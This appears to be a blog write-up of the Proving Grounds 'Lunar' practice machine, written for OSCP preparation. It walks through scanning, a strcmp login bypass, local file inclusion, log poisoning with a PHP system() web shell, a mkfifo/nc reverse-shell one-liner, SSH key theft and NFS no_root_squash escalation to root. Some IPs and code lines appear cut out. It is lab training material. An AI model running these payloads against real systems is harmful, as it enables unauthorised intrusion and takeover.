Proving grounds:Lunar

Al1z4deh:~# echo "Welcome"
4 min readJan 20, 2023

Today we will take a look at Proving grounds: Lunar. My purpose in sharing this post is to prepare for oscp exam. It is also to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c1994b952225ed0f8520d363b448bbcf (RSA)
| 256 0f448badad95b8226af036ac19d00ef3 (ECDSA)
|_ 256 32e12a6ccc7ce63e23f4808d33ce9b3a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Lunar Studio
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3 2049/udp nfs
| 100003 3,4 2049/tcp nfs
| 100005 1,2,3 52125/tcp mountd
| 100005 1,2,3 60293/udp mountd
| 100021 1,3,4 44323/tcp nlockmgr
| 100021 1,3,4 59142/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
2049/tcp open nfs_acl 3 (RPC #100227)
40609/tcp open rpcbind
44323/tcp open nlockmgr 1-4 (RPC #100021)
52125/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • 80 (apache)

When scanning with Nikto, find the file

└─$ nikto -h 
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:
+ Target Port: 80
+ Start Time: 2023-01-20 10:57:10 (GMT4)
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "".
+ Server may leak inodes via ETags, header found with file /, inode: 49b7, size: 5ddbc015cc380, mtime: gzip
+ / Potentially interesting archive/cert file found.

You can also find it in Feroxbuster

200      GET        0l        0w  1265712c


We see the source codes in the login.php file extracted from the file. from here we get the email address, and next to the password we see the strcmp function

if ($_POST[‘email’] && !empty($_POST[‘email’]) && $_POST[‘email’] === ‘liam@lunar.local’ && strcmp($_POST[‘password’], $pwd) == 0) {

bypass and enter dashboard.php


Here we see that we can read files with the ext parameter

  function containsStr($str, $substr) {
return strpos($str, $substr) !== false;
$ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
if(isset($_GET['show'])) {
if(containsStr($_GET['show'], 'pending') || containsStr($_GET['show'], 'completed')) {
error_reporting(E_ALL ^ E_WARNING);
include $_GET['show'] . $ext;
} else {
echo 'You can select either one of these only';

Check the /etc/passwd file with lfi


Check the access.log file for log poisoning


Now let’s enter the poison, enter the cmd parameter

└─$ nc 80     
GET /<?php system($_GET['cmd']); ?>



rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4242 >/tmp/f

Don’t forget to convert the url format


Reverse shell and access to www-data

  • liam


See liam’s id_rsa file, save it and login

└─$ vim liam

└─$ chmod 600 liam

─$ ssh liam@ -i liam

$ script /dev/null -c bash
Script started, file is /dev/null
  • Privesc (no_root_squash)

here we see that we can distribute nfs file only on localhost, for that we add our ip in /etc/hosts file.

liam@lunar:~$ echo " localhost" >> /etc/hosts
liam@lunar:~$ cat /etc/hosts localhost lunar localhost

Preparing our payload and sending it inside

└─$ mkdir tmp 

└─$ sudo mount -t nfs tmp -o nolock
[sudo] password for kali:

└─$ ls

└─$ cd tmp

└─$ ls

└─$ cat > shell.c<<EOF
#include <unistd.h>
int main(){

└─$ sudo gcc -static shell.c -o shell
shell.c: In function ‘main’:
shell.c:5:3: warning: implicit declaration of function ‘system’ [-Wimplicit-function-declaration]
5 | system("/bin/bash");
| ^~~~~~

└─$ sudo chmod u+s shell

Run the shell

liam@lunar:~$ cd /srv
liam@lunar:/srv$ cd share
liam@lunar:/srv/share$ ls
shell shell.c
liam@lunar:/srv/share$ ./shell
root@lunar:/srv/share# whoami

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”